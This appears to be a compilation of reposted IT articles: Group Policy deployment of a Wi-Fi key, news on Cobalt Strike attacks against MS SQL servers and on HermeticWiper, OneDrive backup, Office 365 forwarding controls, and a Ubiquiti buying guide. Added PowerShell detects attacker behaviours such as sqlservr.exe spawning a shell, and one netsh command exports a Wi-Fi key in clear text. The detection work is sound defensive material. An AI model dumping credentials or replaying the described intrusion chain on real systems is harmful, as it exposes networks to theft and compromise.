Deploying WPA2 WiFi profile (including Pre-Shared key) using Group Policy

Problem

Whilst there is a setting in Group Policy Preferences to deploy WiFi settings, this does not include the WiFi Pre-Shared Key (PSK).

The following method will allow you to also push out the Pre-Shared Key:

Solution

From a PC that already has the WiFi profile installed:

Open command prompt (as admin) and run the following command. Make a note of the name of the profile you want to export:

netsh wlan show profiles

Run the following command, replacing the profile name with the one you wish to export and the path with an existing folder where the XML file will be created:

netsh wlan export profile name="MyWiFiSSID" folder=C:\WLAN key=clear

Note that the key=clear is vital for this to work.

Copy that XML file to a network share that is accessible from the computer accounts. Bear in mind that the WiFi key is visible in plain text within this file, so consider carefully where and how to store it.

The following command is used to install the profile:

netsh wlan add profile filename="\\servername\share\Wi-Fi-MyWiFiSSID.xml" user=all

… however, this will reinstall and reconnect the WiFi each time.

From my experience, the best method is to create a Computer Startup script GPO that will only run once. This one does the trick:

REM Skip the install if the marker file from a previous run already exists
IF EXIST C:\WiFi.txt GOTO END

netsh wlan add profile filename="\\servername\share\Wi-Fi-MyWiFiSSID.xml" user=all >> C:\WiFi.txt

:END
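Because the export above is made with key=clear, the XML on the share carries the passphrase unprotected. The PowerShell below is an added example, not part of the original article: it reports whether an exported profile holds a clear-text key (without echoing it) and which broad groups can read the file. The function names and the sample profile are constructed for illustration, and the ACL check is Windows-only and looks at NTFS permissions, not share permissions.

```powershell
# Added example (not from the original article). Function names and the
# sample profile are constructed; the XML mirrors the layout netsh writes
# for a WPA2-PSK profile exported with key=clear.

function Test-WlanProfileExport {
    param([Parameter(Mandatory)][string]$Path)

    $doc = [xml](Get-Content -LiteralPath $Path -Raw)
    $ns  = New-Object System.Xml.XmlNamespaceManager($doc.NameTable)
    $ns.AddNamespace('w', 'http://www.microsoft.com/networking/WLAN/profile/v1')

    $name      = $doc.SelectSingleNode('/w:WLANProfile/w:name', $ns)
    $auth      = $doc.SelectSingleNode('//w:authEncryption/w:authentication', $ns)
    $protected = $doc.SelectSingleNode('//w:sharedKey/w:protected', $ns)
    $key       = $doc.SelectSingleNode('//w:sharedKey/w:keyMaterial', $ns)

    $hasKey      = ($null -ne $key) -and ($key.InnerText.Length -gt 0)
    $isProtected = ($null -ne $protected) -and ($protected.InnerText -eq 'true')

    # Report on the key without ever echoing it.
    [pscustomobject]@{
        File           = $Path
        ProfileName    = if ($null -ne $name) { $name.InnerText } else { $null }
        Authentication = if ($null -ne $auth) { $auth.InnerText } else { $null }
        HasKeyMaterial = $hasKey
        ClearTextKey   = $hasKey -and -not $isProtected
    }
}

function Get-BroadReadAccess {
    param([Parameter(Mandatory)][string]$Path)

    # Well-known SIDs that include ordinary user accounts. Only computer
    # accounts (plus administrators) need to read the file for a startup script.
    $broad = @{
        'S-1-1-0'      = 'Everyone'
        'S-1-5-11'     = 'Authenticated Users'
        'S-1-5-32-545' = 'BUILTIN\Users'
    }
    $readData = [int][System.Security.AccessControl.FileSystemRights]::ReadData

    foreach ($rule in (Get-Acl -LiteralPath $Path).Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if (([int]$rule.FileSystemRights -band $readData) -eq 0) { continue }
        try {
            $sid = $rule.IdentityReference.Translate(
                [System.Security.Principal.SecurityIdentifier]).Value
        } catch {
            continue   # identity could not be resolved to a SID
        }
        # A domain SID ending in -513 is the Domain Users group.
        if ($broad.ContainsKey($sid) -or $sid -match '^S-1-5-21-.+-513$') {
            [pscustomobject]@{
                File     = $Path
                Identity = $rule.IdentityReference.Value
                Sid      = $sid
            }
        }
    }
}

# Constructed sample profile (the passphrase is a dummy value).
$sample = @'
<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>MyWiFiSSID</name>
  <SSIDConfig><SSID><name>MyWiFiSSID</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM>
    <security>
      <authEncryption>
        <authentication>WPA2PSK</authentication>
        <encryption>AES</encryption>
        <useOneX>false</useOneX>
      </authEncryption>
      <sharedKey>
        <keyType>passPhrase</keyType>
        <protected>false</protected>
        <keyMaterial>constructed-example-passphrase</keyMaterial>
      </sharedKey>
    </security>
  </MSM>
</WLANProfile>
'@

$tmp = Join-Path ([System.IO.Path]::GetTempPath()) 'Wi-Fi-MyWiFiSSID.xml'
Set-Content -LiteralPath $tmp -Value $sample -Encoding UTF8

Test-WlanProfileExport -Path $tmp | Format-List
Get-BroadReadAccess -Path $tmp | Format-Table -AutoSize

Remove-Item -LiteralPath $tmp
```

Point both functions at the real XML on the share to check the deployed copy; a row from Get-BroadReadAccess means ordinary users can read the passphrase.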

Source :
https://goddamnpc.com/deploying-wpa2-wifi-profile-including-pre-shared-key-using-group-policy/

Hackers Backdoor Unpatched Microsoft SQL Database Servers with Cobalt Strike

Vulnerable internet-facing Microsoft SQL (MS SQL) Servers are being targeted by threat actors as part of a new campaign to deploy the Cobalt Strike adversary simulation tool on compromised hosts.

“Attacks that target MS SQL servers include attacks to the environment where its vulnerability has not been patched, brute forcing, and dictionary attack against poorly managed servers,” South Korean cybersecurity company AhnLab Security Emergency Response Center (ASEC) said in a report published Monday.

Cobalt Strike is a commercial, full-featured penetration testing framework that allows an attacker to deploy an agent named “Beacon” on the victim machine, granting the operator remote access to the system. Although billed as a red team threat simulation platform, cracked versions of the software have been actively used by a wide range of threat actors.

Intrusions observed by ASEC involve the unidentified actor scanning port 1433 to check for exposed MS SQL servers to perform brute force or dictionary attacks against the system administrator account, i.e., “sa” account, to attempt a log in.

That’s not to say that servers not left accessible over the internet aren’t vulnerable, what with the threat actor behind LemonDuck malware scanning the same port to laterally move across the network.

“Managing admin account credentials so that they’re vulnerable to brute forcing and dictionary attacks as above or failing to change the credentials periodically may make the MS-SQL server the main target of attackers,” the researchers said.

Upon successfully gaining a foothold, the next phase of the attack works by spawning a Windows command shell via the MS SQL “sqlservr.exe” process to download the next-stage payload that houses the encoded Cobalt Strike binary on to the system.

The attacks ultimately culminate with the malware decoding the Cobalt Strike executable, followed by injecting it into the legitimate Microsoft Build Engine (MSBuild) process, which has been previously abused by malicious actors to filelessly deliver remote access trojans and password-stealing malware on targeted Windows systems.

Furthermore, the Cobalt Strike that’s executed in MSBuild.exe comes with additional configurations to evade detection of security software. It achieves this by loading “wwanmm.dll,” a Windows library for WWan Media Manager, then writing and running the Beacon in the memory area of the DLL.

“As the beacon that receives the attacker’s command and performs the malicious behavior does not exist in a suspicious memory area and instead operates in the normal module wwanmm.dll, it can bypass memory-based detection,” the researchers noted.
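The three behaviours described in this report (repeated failed "sa" logins, sqlservr.exe starting a command shell, and MSBuild.exe loading wwanmm.dll) translate into simple host-side detections. The PowerShell below is an added example, not taken from the article or from ASEC: the event records are constructed, and the field names and the threshold are assumptions loosely modelled on Sysmon process-create and image-load events and SQL Server failed-login audit entries.

```powershell
# Added example: detections for the behaviours described above, run over
# constructed, normalized event records. Field names and the threshold are
# assumptions, not a real log schema.

function Find-SaBruteForce {
    param([object[]]$Events, [int]$Threshold = 5)
    # Many failed logins for the "sa" account from one source address.
    $Events |
        Where-Object { $_.Type -eq 'LoginFailed' -and $_.Account -eq 'sa' } |
        Group-Object -Property SourceIp |
        Where-Object { $_.Count -ge $Threshold } |
        ForEach-Object {
            [pscustomobject]@{
                Rule     = 'sa-bruteforce'
                Computer = $_.Group[0].Computer
                Detail   = "$($_.Count) failed sa logins from $($_.Name)"
            }
        }
}

function Find-SqlShellSpawn {
    param([object[]]$Events)
    # sqlservr.exe as the parent of a command interpreter. The article names
    # the Windows command shell; powershell.exe is added here as an assumption.
    $Events |
        Where-Object {
            $_.Type -eq 'ProcessCreate' -and
            $_.ParentImage -match '(^|\\)sqlservr\.exe$' -and
            $_.Image -match '(^|\\)(cmd|powershell)\.exe$'
        } |
        ForEach-Object {
            [pscustomobject]@{
                Rule     = 'sqlservr-shell-spawn'
                Computer = $_.Computer
                Detail   = "$($_.ParentImage) started $($_.Image)"
            }
        }
}

function Find-MsBuildWwanmmLoad {
    param([object[]]$Events)
    # MSBuild.exe loading wwanmm.dll, the module the Beacon is written into.
    $Events |
        Where-Object {
            $_.Type -eq 'ImageLoad' -and
            $_.Image -match '(^|\\)msbuild\.exe$' -and
            $_.ImageLoaded -match '(^|\\)wwanmm\.dll$'
        } |
        ForEach-Object {
            [pscustomobject]@{
                Rule     = 'msbuild-wwanmm-load'
                Computer = $_.Computer
                Detail   = "$($_.Image) loaded $($_.ImageLoaded)"
            }
        }
}

# Constructed sample events (documentation IP ranges, hypothetical host names).
$sqlservr = 'C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe'
$msbuild  = 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe'

$events = @(
    1..6 | ForEach-Object {
        [pscustomobject]@{ Type = 'LoginFailed'; Computer = 'SQL01'; Account = 'sa'; SourceIp = '203.0.113.7' }
    }
    # A single failure from another address stays below the threshold.
    [pscustomobject]@{ Type = 'LoginFailed'; Computer = 'SQL01'; Account = 'sa'; SourceIp = '198.51.100.20' }
    [pscustomobject]@{ Type = 'ProcessCreate'; Computer = 'SQL01'
                       ParentImage = $sqlservr; Image = 'C:\Windows\System32\cmd.exe' }
    # Benign: an interactive shell started from Explorer.
    [pscustomobject]@{ Type = 'ProcessCreate'; Computer = 'WS07'
                       ParentImage = 'C:\Windows\explorer.exe'; Image = 'C:\Windows\System32\cmd.exe' }
    [pscustomobject]@{ Type = 'ImageLoad'; Computer = 'SQL01'
                       Image = $msbuild; ImageLoaded = 'C:\Windows\System32\wwanmm.dll' }
    # Benign: MSBuild loading an ordinary system library.
    [pscustomobject]@{ Type = 'ImageLoad'; Computer = 'WS07'
                       Image = $msbuild; ImageLoaded = 'C:\Windows\System32\kernel32.dll' }
)

$alerts = @(Find-SaBruteForce -Events $events) +
          @(Find-SqlShellSpawn -Events $events) +
          @(Find-MsBuildWwanmmLoad -Events $events)

$alerts | Format-Table -AutoSize
```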

Source :
https://thehackernews.com/2022/02/hackers-backdoor-unpatched-microsoft.html

New Wiper Malware Targeting Ukraine Amid Russia’s Military Operation

Cybersecurity firms ESET and Broadcom’s Symantec said they discovered a new data wiper malware used in fresh attacks against hundreds of machines in Ukraine, as Russian forces formally launched a full-scale military operation against the country.

The Slovak company dubbed the wiper “HermeticWiper” (aka KillDisk.NCV), with one of the malware samples compiled on December 28, 2021, implying that preparations for the attacks may have been underway for nearly two months.

“The wiper binary is signed using a code signing certificate issued to Hermetica Digital Ltd,” ESET said in a series of tweets. “The wiper abuses legitimate drivers from the EaseUS Partition Master software in order to corrupt data. As a final step the wiper reboots [the] computer.”

Specifically, HermeticWiper is delivered via the benign but signed EaseUS partition management driver that then proceeds to impair the first 512 bytes, the Master Boot Record (MBR) for every physical drive, before initiating a system shutdown and effectively rendering the machine inoperable.

“After a week of defacements and increasing DDoS attacks, the proliferation of sabotage operations through wiper malware is an expected and regrettable escalation,” SentinelOne’s principal threat researcher Juan Andres Guerrero-Saade said in a report analyzing the new malware.

At least one of the intrusions involved deploying the malware directly from the Windows domain controller, indicating that the attackers had taken control of the target network.

The scale and the impact of the data-wiping attacks remains unknown as yet, as is the identity of the threat actor behind the infections. But the development marks the second time this year that a destructive malware has been deployed on Ukrainian computer systems after the WhisperGate operation in mid-January.

The wiper attacks also follow a third “massive” wave of distributed denial-of-service (DDoS) attacks that hit several Ukrainian government and banking institutions on Wednesday, knocking out online portals for the Ministry of Foreign Affairs, Cabinet of Ministers, and Rada, the country’s parliament.

Last week, two of the largest Ukrainian banks, PrivatBank and Oschadbank, as well as the websites of the Ukrainian Ministry of Defense and the Armed Forces suffered outages as a result of a DDoS attack from unknown actors, prompting the U.K. and U.S. governments to point the fingers at the Russian Main Intelligence Directorate (GRU), an allegation the Kremlin has denied.

Campaigns that use DDoS attacks deliver torrents of junk traffic that are intended to overwhelm targets with the goal of rendering them inaccessible. A subsequent analysis of the February 15 incidents by the CERT-UA found that they were carried out using botnets such as Mirai and Mēris by leveraging compromised MikroTik routers and other IoT devices.

What’s more, information systems belonging to Ukraine’s state institutions are said to have been unsuccessfully targeted in as many as 121 cyber attacks in January 2022 alone.

That’s not all. Cybercriminals on the dark web are looking to capitalize on the ongoing political tensions by advertising databases and network accesses containing information on Ukrainian citizens and critical infra entities on RaidForums and Free Civilian marketplaces in “hopes of gaining high profits,” according to a report published by Accenture earlier this week.

The continuous onslaught of disruptive malicious cyber acts since the start of the year has also led the Ukrainian law enforcement authority to paint the attacks as an effort to spread anxiety, undermine confidence in the state’s ability to defend its citizens, and destabilize its unity.

“Ukraine is facing attempts to systematically sow panic, spread fake information and distort the real state of affairs,” the Security Service of Ukraine (SSU) said on February 14. “All this combined is nothing more than another massive wave of hybrid warfare.”

Source :
https://thehackernews.com/2022/02/new-wiper-malware-targeting-ukraine.html

Back up your Documents, Pictures, and Desktop folders with Microsoft OneDrive

You can back up your important folders (your Desktop, Documents, and Pictures folders) on your Windows PC with OneDrive PC folder backup, so they’re protected and available on other devices. If you haven’t already set up OneDrive on your computer, see Sync files with OneDrive in Windows. There’s no extra cost for PC folder backup (up to 5 GB of files without a subscription). See OneDrive plans.

Note: If you’re surprised that your files are saving to OneDrive, see Files save to OneDrive by default in Windows 10.

Set up PC folder backup

  1. If you’re prompted to back up your important folders (Desktop, Documents, and Pictures), select the prompt to start the folder backup wizard. If you didn’t see the prompt or you already closed the wizard, select the white or blue cloud icon in the Windows notification area, and then select Help & Settings > Settings, then Backup > Manage backup.
  2. In the Back up your folders dialog, make sure the folders that you want to back up are selected.
  3. Select Start backup.
  4. You can close the dialog box while your files sync to OneDrive. Or, to watch your files sync, select View upload progress. If you already closed the dialog, to open the OneDrive activity center, select the white or blue cloud in the notification area.

Access your backed up folders on any device

When your files finish syncing to OneDrive, they’re backed up and you can access them from anywhere in Documents, Desktop, or Pictures. When you back up your Desktop folder, the items on your desktop roam with you to your other PC desktops where you’re running OneDrive.

You can back up a maximum of 5 GB of files in OneDrive for free, or up to 1 TB with a Microsoft 365 subscription.

If you’re signed in to the OneDrive sync app on your computer, you can use File Explorer to access your OneDrive. You can also use the OneDrive mobile app to access your folders on any device.

Manage or stop PC folder backup

To stop or start backing up your folders in OneDrive, update your folder selections in OneDrive Settings. 

  1. Open OneDrive settings (select the white or blue cloud icon in your notification area, and then select Help & Settings > Settings).
  2. In Settings, select Backup > Manage backup.
  3. To start backing up a folder, select any folder that doesn’t say Files backed up, and then select Start backup.
  4. To stop backing up a folder, select Stop backup, and confirm your request.  See important notes below.
  • When you stop backing up a folder, the files that were already backed up by OneDrive stay in the OneDrive folder, and will no longer appear in your device folder. 
  • In the folder that you stopped backing up, you’ll see an icon titled Where are my files that’s a shortcut to your folders in OneDrive. To access your files, select the icon to open the folder in OneDrive. 
  • If you want those files back in your device folder and not in OneDrive, move them manually from the OneDrive folder back to your device folder. Note that any new files you add to that folder on your device won’t be backed up by OneDrive after you stop the backup.
  • To move the files, select Where are my files to open the folder in OneDrive, then select the files that you want to move to your device folder, and drag them to that location.

Fix problems with PC folder backup

Here is a list of errors you might see when you set up PC folder backup and how to resolve them:

  • The following file type can’t be protected: Outlook database files (.pst).
  • Folder protection is unavailable: A common reason for this error is that important folders on PCs that are connected to a domain can’t be protected in a personal OneDrive account (when you’re signed in with a Microsoft account). For info about data protection solutions, contact your IT administrator. You shouldn’t have this issue with a work or school account.
  • File exceeds the maximum path length: Make sure the entire file path, including the file name, contains fewer than 260 characters. An example of a file path is:
    C:\Users\<UserName>\Pictures\Saved\2017\December\Holiday\NewYears\Family…
    To resolve this, shorten the name of your file or the name of subfolders in OneDrive, or select a sub-folder that’s closer to the top-level folder.
  • File exceeds the maximum file size: OneDrive can’t sync files over 250GB. Remove these files from the folder you want to protect and then try again.
  • The file name isn’t allowed in OneDrive: File names can’t start with a space or include any of these characters: \ : / * ? < > " |. Please move or rename the file to continue.
  • The folder isn’t selected for syncing: The folder with the error is not syncing to your PC. To resolve this error, open OneDrive Settings (right-click the white or blue cloud icon in your notification area, and select Settings), select Choose Folders, and then make sure the folder you want to protect is selected. If Pictures is showing this error, make sure that Pictures, Screenshots, and Camera Roll are all selected (or don’t exist). It’s also possible that the OneDrive folder has a different name from the Windows important folder.
  • Important folders aren’t in the default locations: The folder with the error contains another important folder and can’t be protected until the contained folder is moved. Important folders that may be contained within the folder include: Documents, Desktop, Pictures, Screenshots, Camera Roll, or the OneDrive folder.
  • An unknown error occurred, with error code 0x80070005: If you receive error code 0x80070005, the “Prohibit User from manually redirecting Profile Folders” group policy is enabled. You may find that the files from the folders you selected were moved to identically named folders in your OneDrive folder, and the original locations are empty. Move the folder contents back to the original locations and ask your administrator whether the policy can be changed.
  • Folder contains a reparse point (junction point or symlink): The folder you want to protect contains a special file type that links parts of the file system together. These items can’t be protected. To protect the folder, remove the file causing the issue. Caution: Some applications may depend on these links to function properly. Remove only the links that you know are safe to modify.
  • Post PC folder backup: OneDrive tries to automatically re-open notebooks that were previously open. In rare cases, some notebooks may not be automatically loaded in the OneNote desktop app after PC folder backup. The workaround for this issue is to reopen the notebooks in the OneNote app using File > Open.

Source :
https://support.microsoft.com/en-us/office/back-up-your-documents-pictures-and-desktop-folders-with-onedrive-d61a7930-a6fb-4b95-b28a-6552e77c3057

Microsoft Office 365 to stop data theft by disabling external forwarding

Microsoft is planning to put a stop to enterprise data theft via email forwarding by disabling Office 365’s email forwarding to external recipients by default.

The company also wants to add improved external email forwarding controls which will allow Office 365 admins to enable the feature only to select employees in their organizations.

“External forwarding of email is a tactic used by attackers to exfiltrate data out of an organization and controlling that process is difficult,” Microsoft explains on the new feature’s Microsoft 365 roadmap entry.

“With this new feature, we are adding support for more granular controls that allow the Office 365 administrators to easily enable external forwarding for the right people in the organization through the outbound spam policy.”

The new feature is planned to be generally available and to start rolling out to all environments with Office 365 Advanced Threat Protection (ATP) plans starting in the fourth quarter of 2020.

How to stop auto-forwarding for emails

Until external email forwarding is disabled by default, Microsoft provides step-by-step instructions on how to stop it manually to prevent hackers from stealing proprietary information by exfiltrating it to outside email addresses under their control.

To do this, you will have to create a custom mail flow rule by following these steps:
• Go to the Exchange admin center, select Exchange mail flow, and on the rules tab, select the plus sign and choose to create a new rule.
• Select More options. Name your new rule.
• Then open the drop-down to apply this rule if, select the sender and then is external/internal.
• Select Inside the organization, and then OK.
• Choose to add condition, open the drop-down, select The message properties, then include the message type.
• Open the select message type drop-down, choose Auto-forward, then OK.
• Open the Do the following drop-down, select Block the message, then reject the message and include an explanation.
• Enter the message text for your explanation, then select OK.
• Scroll to the bottom and select Save.

Once the rule has been created, attackers will no longer be able to enable auto-forwarding for that user’s mailbox.
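The same rule can be created from Exchange Online PowerShell instead of the admin center. This is an added example, not taken from the article or from Microsoft's instructions: it assumes a session already opened with Connect-ExchangeOnline, and the rule name, comment and rejection text are placeholders.

```powershell
# Added example. Assumes an Exchange Online PowerShell session is already
# connected (Connect-ExchangeOnline, ExchangeOnlineManagement module).
# Rule name, comment and rejection text are placeholders.

$ruleName = 'Block auto-forwarded mail from internal senders'

$ruleParams = @{
    Name                    = $ruleName
    # "Apply this rule if: the sender is external/internal: Inside the organization"
    FromScope               = 'InOrganization'
    # "The message properties: include the message type: Auto-forward"
    MessageTypeMatches      = 'AutoForward'
    # "Block the message: reject the message and include an explanation"
    RejectMessageReasonText = 'Automatic forwarding is not permitted. Contact the help desk.'
    Comments                = 'Created from the auto-forward blocking procedure'
    # Optional and not part of the steps above: limit the rule to messages
    # leaving the organization, so internal auto-forwards keep working.
    # SentToScope           = 'NotInOrganization'
}

# Create the rule only if one with this name does not exist yet.
$existing = Get-TransportRule | Where-Object { $_.Name -eq $ruleName }
if ($existing) {
    Write-Output "Rule '$ruleName' already exists (state: $($existing.State))."
} else {
    New-TransportRule @ruleParams
}

# Review every mail flow rule that matches on the auto-forward message type.
Get-TransportRule |
    Where-Object { $_.MessageTypeMatches -eq 'AutoForward' } |
    Select-Object Name, State, Mode, FromScope, SentToScope, RejectMessageReasonText
```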

Increase your org’s security

Redmond also has a list of ten measures you can take to boost your organization’s data security for both Microsoft 365 Business Standard and Microsoft 365 Business Premium service plans.

The list of tasks you need to go through to increase the security of your organization:
1. Set up multi-factor authentication (MFA) to prevent hackers from taking over accounts if they know the password.
2. Train your users to use strong passwords, protect their devices, and enable security features on Windows 10 and Mac PCs.
3. Use dedicated admin accounts.
4. Raise the level of protection against malware in mail (guidance on how to do that is available in this training video).
5. Protect against ransomware by blocking file extensions commonly used for ransomware using mail flow rules.
6. Stop auto-forwarding for email.
7. Use Office Message Encryption.
8. Protect your email from phishing attacks using an ATP anti-phishing policy.
9. Protect against malicious attachments and files with ATP safe attachment policies.
10. Protect against phishing attacks with ATP Safe Links.

Part of a broader push to secure Office 365

This new Office 365 ATP feature is part of a larger effort to make the cloud-based email filtering service secure by default as Microsoft also wants to include a new feature that will block email sender domains automatically if they fail DMARC authentication.

Redmond is also working on including automated malicious content blocking in Office 365 regardless of admin or user custom configurations unless manually overridden.

Once this new feature is enabled, Office 365 will honor EOP/ATP malware analysis (detonation) verdicts to automatically block known malicious files and URLs.

In October 2019, Microsoft also enabled Authenticated Received Chain (ARC) for all hosted mailboxes to improve anti-spoofing detection. The ARC protocol supplements the DKIM and DMARC email authentication protocols as part of Internet Mail Handlers’ effort to combat email spoofing especially when dealing with forwarded messages.

Source :
https://www.bleepingcomputer.com/news/security/office-365-to-stop-data-theft-by-disabling-external-forwarding/

How to set up the ultimate Ubiquiti UniFi home network in 2022

If you’re in the market for a new Wi-Fi 6 router, the best deliver reliable coverage to all corners of your home at little cost to get started. If you need extensibility, mesh routers allow you to add additional nodes. But if you want extensive configuration options and an all-in-one solution to cover routing, switching, and home security, consider Ubiquiti’s portfolio. Its UniFi brand covers switches and routers aimed at small businesses, but it turned its attention to the consumer category over the last two years with a decent selection of products. Ubiquiti offers a range of security cameras and video doorbells under UniFi Protect, which can easily integrate into an UniFi network. The best part about Ubiquiti’s home security products is they record footage locally and don’t send data to a cloud service, providing better privacy without paying a monthly license to access all the security camera and video doorbell features. So if you’re looking to overhaul your home network, here’s what Ubiquiti has to offer.

All-in-one solution: UniFi Dream Router

If you don’t want to get a standalone wired router, switch over and add wireless access points, then you’ll want to take a look at Ubiquiti’s unified solutions. The latest offering is the UniFi Dream Router, and it goes up against the best Wi-Fi 6 routers. It’s the second all-in-one device in the UniFi range — after the Wi-Fi 5-based UniFi Dream Machine — and the feature-set you get here is astounding when you consider what it costs.

But first, a rundown of the hardware: the Dream Router has a cylindrical design similar to the Dream Machine, but a tiny screen at the front shows real-time network statistics. The router has 4×4 MIMO and goes up to 2.4Gbps with Wi-Fi 6, and it utilizes 160MHz channels. There’s a dual-core CPU, 128GB of storage, an SD card slot, 2GB of RAM, and four Ethernet ports with two offering PoE.

Because it is an UniFi product, the Dream Router has an exhaustive set of configuration options that far exceed most consumer routers. For example, it lets you connect and manage Ubiquiti’s security cameras and video doorbells. It is relatively straightforward to set up from your phone, and if you don’t want to tweak every setting, that’s fine. The options are there should you need them.

Now, there are a few caveats. First, the Dream Router is still in testing and isn’t finalized, and as such, you can only buy it from Ubiquiti’s Early Access store. You’ll have to make a free account to access the store, and while it’s sold out, it’s being restocked regularly. The Dream Router sells out periodically because of its price: $79.

For under $100, there isn’t another router that delivers anywhere close to the same set of features as the Dream Router, and with the router estimated to debut for a lot more once it hits the regular sales channel, now is the best time to pick it up.

UniFi Dream Router

With 4×4 MIMO and 2.4Gbps bandwidth over Wi-Fi 6, four Gigabit Ethernet ports with two PoE ports, and a screen at the front for monitoring real-time traffic, the Dream Router is the ultimate value.

Routing: UniFi Dream Machine Pro

If you want to use a standalone router for managing your home network, you should take a look at the UniFi Dream Machine Pro (UDM Pro). I switched to the UDM Pro last year, and it has been a revelation. However, unlike the Dream Machine or Dream Router, the UDM Pro is a 1U rack-mounted solution, so you will need a rack server if you want to go down this route.

The UDM Pro is designed to be a wired router, so you’ll have to buy a switch and a wireless AP to connect your wireless devices like phones, tablets, and notebooks. Now, the standout feature with the UDM Pro is that it has a 3.5-inch HDD slot to facilitate network video recording (NVR), so if you want to add Ubiquiti’s security cameras to your network, this is the ideal way to go. In addition, you can slot in a 4TB drive in the UDM Pro and access locally-stored recordings going back weeks and months.

As for hardware, the UDM Pro has a built-in switch with eight Gigabit ports with a 1GbE backplane, 10Gbps SFP+ ports, and a quad-core CPU with Cortex-A57 cores. It includes the full suite of UniFi OS applications, including UniFi Network for switching, UniFi Protect for security cameras, UniFi Talk for VoIP, and UniFi Access for managing door access in a small office environment. The UDM Pro also offers intrusion detection and prevention features that block access to malicious websites.

Having used the UDM Pro extensively for the last year, the only downside I can think of is that it lacks built-in PoE ports. So when you’re connecting Ubiquiti’s wireless access points, you will need to buy an additional PoE injector.

UniFi Dream Machine Pro

The UDM Pro sits at the heart of a prosumer UniFi install. The rack-mounted router comes with an 8-port switch and 10G SFP+ ports, a 3.5-inch drive tray to use as a network video recorder, and class-leading threat management features.

Switching: UniFi Switch 24 PoE

While I have over 30 devices connected to the wireless access points in my home at any given time, I use wired connectivity for the devices that I use the most, including the work machines, TVs, and the PS5. So while the UDM Pro has an eight-port switch, I find that a 24-port option is the best way to go, particularly if you’re going to connect a lot of security cameras. For context, I’m currently using over a dozen ports on my Switch Pro 24 PoE.

As for the switch, the Switch Pro 24 PoE is a fantastic choice, but at $699, it is also very costly. My recommendation would be the standard Switch 24 PoE; it is a 24-port switch with 16 Gigabit PoE+ ports with a total power budget of 95W alongside eight Gigabit ports. Like the UDM Pro, it is a 1U rack-mountable solution, and you get a small screen on the left for viewing real-time statistics.

The 95W power budget is more than adequate for the wireless access points and security cameras, and at $379, the Switch 24 PoE costs nearly half as much as the Pro version, and while you miss out on 10Gbps SFP+ ports, it has most of the essentials covered. If you don’t want a rack-mounted solution, you should look at the Switch Lite 16 PoE, a 16-port switch with eight PoE+ ports.

UniFi Switch 24 PoE

If you need more ports for wired connections, the Switch 24 PoE is the ideal option. It has 16 802.3at PoE ports with a cumulative power budget of 95W and can easily accommodate a slate of wireless access points and security cameras.

Wireless: UniFi Access Point Wi-Fi 6 Lite

With a wired router and switch sorted out, you’ll need a wireless access point so wireless devices like phones and tablets can connect to your home network. Ubiquiti has three options in this area: Wi-Fi 6 Lite, 6 Pro, and 6 Long Range. As the name suggests, all three are based on Wi-Fi 6, and they share a similar design.

These APs work best when mounted on the ceiling or the wall as the antennae are positioned sideways. The $99 Wi-Fi 6 Lite has 2×2 MIMO and goes up to 1.2Gbps on the 5GHz band, with a gain of 3dBi. The $149 Wi-Fi 6 Pro and $179 Wi-Fi 6 Long Range have IP54 ratings, draw power using the 802.3at PoE+ standard, and are designed for indoor and outdoor use.

The Wi-Fi 6 Pro is the newer offering and comes with higher-gain antennae that go up to 6dBi, with maximum 5GHz throughput of 4.8Gbps, with the Long Range going up to 5.5dBi and 2.4Gbps over 5GHz. The Wi-Fi 6 Pro also is the only access point in Ubiquiti’s portfolio that offers the 160MHz channel.

I use a Wi-Fi 6 Long Range and Wi-Fi 6 Lite in my home, but if you’re starting from scratch, a good bet would be to get a Wi-Fi 6 Lite and Wi-Fi 6 Pro to get going and add more as needed. These access points seamlessly integrate into the UniFi network and can be configured with the UDM Pro.

UniFi Access Point Wi-Fi 6 Lite

The Wi-Fi 6 Lite access point has 2×2 MIMO and 1.2Gbps throughput over 5GHz, and it does a good job delivering reliable Wi-Fi 6 signal to all corners of your home.

UniFi Access Point Wi-Fi 6 Pro

Ubiquiti’s latest wireless access point has it all: 160MHz channels over Wi-Fi 6, 4×4 MIMO with a 4.8Gbps throughput at 5GHz, and the ability to connect to up to 300 clients.

Security camera and doorbell: G4 series

Security cameras are a big part of the UniFi Protect portfolio, and Ubiquiti offers a dozen products in this area. I use a combination of the G3 Flex, G4 Bullet, and the G4 Dome inside (and outside) my home, and they’re pretty good at what they do. Ubiquiti’s cameras draw power over PoE and let you record 1080p footage, plus you get weather resistance with the G4 series.

In my use case, I found the G3 Flex to be ideal as an indoor camera as it can be positioned just about anywhere inside the house, with the G4 Bullet and G4 Dome suited for outdoor use. The G3 Flex starts at $79, and you can pick up a pack of three for $229.

The G4 Bullet offers 1440p recording that sells for $199, and if you want 4K video, 3x zoom lens, and IP67, you will need to get the $449 G4 Pro. Several users had issues with condensation on the G4 Bullet last year, but that hasn’t been a drawback for me. I haven’t used Ubiquiti’s doorbells just yet. Still, the G4 Doorbell offers a similar set of features as other smart video doorbells, including two-way audio, motion detection, and Wi-Fi connectivity. Here’s a breakdown of the feature-set that each security camera offers:

[Image: UniFi Protect series. Source: Ubiquiti]

You can pair the security cameras and doorbells to any UniFi routing solution with UniFi Protect. As for managing the security devices, you can install the UniFi Protect app on your phone and configure motion detection areas, privacy zones where the cameras won’t record footage, and smart detection for faces and vehicles.

You get a decent number of options for notifications, including the ability to set custom schedules and receive information at a set time. The cameras do a good job with motion detection and notification alerts, and UniFi Protect has a good UI that lets you view events and see recorded footage with ease. The best part is that all footage is stored locally, so you don’t have to pay a license fee to access all the features on offer. Unfortunately, there’s no active monitoring like you get with Arlo or Ring, but UniFi Protect gets a lot right for a self-hosted solution.

UniFi Camera G3 Flex

The G3 Flex is a great indoor camera, thanks to its versatile design. You get 1080p video recording, integrated IR LEDs for motion detection at night, and a built-in mic.

UniFi Camera G4 Bullet

The G4 Bullet has 1440p recording, a weather-sealed design, a built-in mic, a 110-degree angle of view, and LEDs for recording at night.

Building your UniFi network

Ubiquiti has significantly expanded its consumer offerings in the last two years, and if you’re interested in getting started with an UniFi home network, you have a lot of choices. The UDM Pro is ideally suited as a routing solution because of the hardware on offer and the extensive feature-set and configuration. You can pair it with a multitude of switches and wireless access points.

